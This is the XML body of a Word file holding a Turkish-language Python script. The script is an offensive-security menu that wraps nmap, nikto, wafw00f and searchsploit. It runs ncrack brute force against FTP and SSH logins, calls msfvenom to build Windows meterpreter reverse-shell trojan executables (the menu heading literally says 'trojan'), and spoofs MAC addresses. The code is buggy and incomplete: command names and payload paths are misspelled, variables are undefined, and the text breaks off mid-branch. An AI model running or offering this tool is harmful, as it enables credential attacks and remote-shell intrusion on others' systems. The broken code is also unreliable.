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5762" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">#! /usr/bin/env python </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9B3C75" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6B1B3D" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>os.system("apt-get install figlet")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A00B89E" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>os.system("clear")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B76DDA" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>os.system("figlet PORT TARAMA")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFDFF9D" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>print("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E440572" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>Tarama Aracina Hos Geldiniz :)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7291D754" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="5FFEA773" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>-PORT TARAMA ARACI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="476AE362" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>1) Hizli Tarama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA20310" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>2) Servis ve Version Bilgisi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645C5C32" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>3) Isletim Sistemi Bilgisi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4649CCC5" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="18417CE8" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>-ZAFIYET ANALIZI ARACI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="236193DE" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>4) Zafiyet Analizi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71727F57" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="508C28B0" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>-GUVENLIK DUVARI TESPIT ARACI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C01B9FC" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>5) Guvenlik Duvari Tespit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5948CE6A" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="5923987D" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>-EXPLOIT TARAMA ARACI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="459DE766" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>6)Exploit Tarama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C314C9" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="38014FF7" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>-ROOTKIT TARAMA ARACI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2565949E" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>7) Rootkit Tarama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45033BBA" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="28172F9B" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>-KABA KUVVET TARAMA ARACI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C8A0967" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">8) FTP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769781D1" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>9) SSH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5C211E" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>10) Telnet</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426F4ED8" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>11) HTTP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4330913B" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>12) SMB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39405954" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>13) ROP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AFBDA2" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>14) SIP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="150AF30E" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>15) Redis</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601B15A8" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>16) VNC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A1AC95E" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>17) PostgreSQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40ABCDE0" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>18) MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A05E318" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="6EE5C597" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>-TROJEN ARACI PAYLOADLAR</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FDA22B2" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>19) windows/meterpreter/reverse_tcp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E71F5C8" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>20) windows/meterpreter/reverse_http</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EEE1E2" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>21) windows/meterpreter/reverse_https</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B5C680D" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="2310A978" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>-MAC DEGISTIRME</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5142260D" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>22) MAC Adresi Random Belirle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BAA92C" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>23) MAC Adresi Elle Belirle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20F8DEC5" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>24) MAC Adresi Orijinale Dondur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0686E0B2" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="7F66B7D2" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="22A6E51B" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>-ZAFIYET ANALIZ ARACI - 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B01359" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>25) Zafiyet Analizi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38E335AB" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="7F8EB02B" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>-VPN KONTROL ARACI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="200953AA" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>26) VPN Kontrol</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DB65EB" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="1BE1B4F3" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>-WORDPRESS TARAMA ARACI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE79A2E" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>27) Hizli Tarama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C12B0A1" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>28) Eklenti Tarama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="140EC2C5" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>29) Tema Tarama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1552AE79" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>30) Yonetici Kullanici Adi Tarama</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FFC268F" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="2760042F" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>-VERI TABANI TARAMA ARACI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="298D3673" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>31) Sadece Acik Linki Biliyorum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296E962C" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>32) Acik Linki ve Veritabani Adini Biliyorum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1283D8E6" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>33) Acik Linki, Veritabani Adini ve Tablo Adini Biliyorum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6724AAE5" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>34) Acik Linki, Veritabani Adini, Tablo Adini ve Colon Adini Biliyorum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04BD0E01" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="63CEE4AC" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>-WORDLIST ARACI</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1327900D" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">35) Wordlist </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FCDF5F9" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>""")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B623496" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="11884453" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="33B1D1DC" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>islemno = raw_input("Islem Numarasini Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47CCB71E" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="1399DDB5" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="10DB1A23" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>if(islemno=="1"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408658BA" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                hedefip = raw_input("Hedef Ip Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D06B142" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                os.system("nmap " + hedefip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CB1B14" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDA8988" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">elif(islemno=="2"): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20DB1A3F" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                hedefip = raw_input("Hedef Ip Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="108AB5D6" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                os.system("nmap -sS -sV " + hedefip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="346E8924" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F8FFEFA" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">elif(islemno=="3"): </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22356895" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                hedefip = raw_input("Hedef Ip Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75F9D299" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                os.system("nmap -O " + hedefip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1139D0" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BE3885A" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">elif(islemno=="4"):           </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32F2A97B" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                hedefip = raw_input("Hedef Ip Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225CA3C9" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("nikto -h " + hedefip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5704102A" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="51ECF34C" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">elif(islemno=="5"):    </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3E94DC" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>site= raw_input("Hedef Adres: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE18521" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("wafw00f " + site)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FBD0838" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="41F14641" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">elif(islemno=="6"):    </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6020F378" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                anahtarkelime = raw_input("Anahtar Kelime Giriniz: ")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2923D9" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("searchsloit " + anahtarkelime)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24513332" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A25C647" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>elif(islemno=="7"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="763465B6" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">os.system("chkrootkit")              </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532EE1BD" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4896FBC8" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>elif(islemno=="8"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6346059D" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("nrack -p 21 -u " + kullaniciadi + " -P " + sifre + " " + hedefip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10524FB3" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C83C93" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">elif(islemno=="9"):          </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC8B63B" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                os.system("ncrack -p 22 -u " + kullaniciadi + " -P " + sifre + " " + hedefip)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B03E5AE" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">                </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8EFB6E" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t xml:space="preserve">elif(islemno=="19"):      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B50A625" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("msfvenom -p windows/meterpreter/reverse/tcp LHOST=" + ip + " LPORT=" + port + " -f exe -o " + kayityeri)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5002A498" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>elif(islemno=="20"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10713C2E" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("msfvenom -p windows/meterpreter/reverse_http LHOST=" + ip + " LPORT=" + port + " -f exe -o " + kayityeri)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="631E65D5" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>elif(islemno=="21"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20359444" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("msfvenom -p windows/meterpreter/reverse_htts LHOST=" + ip + " LPORT=" + port + " -f exe -o " + kayityeri)</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="4285C028" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="20299500" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3"/>
    <w:p w14:paraId="7645EC00" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:t>if(islemno=="22"):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="737BB562" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("ifconfig eth0 down")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEA5454" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("macchanger -r eth0")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B211BB" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>os.system("ifconfig eth0 up")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255EE61D" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
        <w:t>print("\033[92mYeni MAC Adresi Elle Belirlendi.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44AE9C55" w14:textId="77777777" w:rsidR="00EB20F3" w:rsidRDefault="00EB20F3" w:rsidP="00EB20F3">
      <w:r>
        <w:tab/>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
